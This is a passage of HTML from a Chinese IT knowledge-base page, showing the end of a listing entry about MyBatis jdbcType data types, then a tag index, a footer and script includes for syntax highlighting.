title="mybatis常用jdbcType数据类型" target="_blank">mybatis常用jdbcType数据类型</a> ysj5125094 <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/mapper/1.htm">mapper</a><a class="tag" taget="_blank" href="/search/jdbcType/1.htm">jdbcType</a> <div> MyBatis 通过包含的jdbcType 类型 BIT FLOAT CHAR </div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> 按字母分类： <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.  </div> </div> </footer>  <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>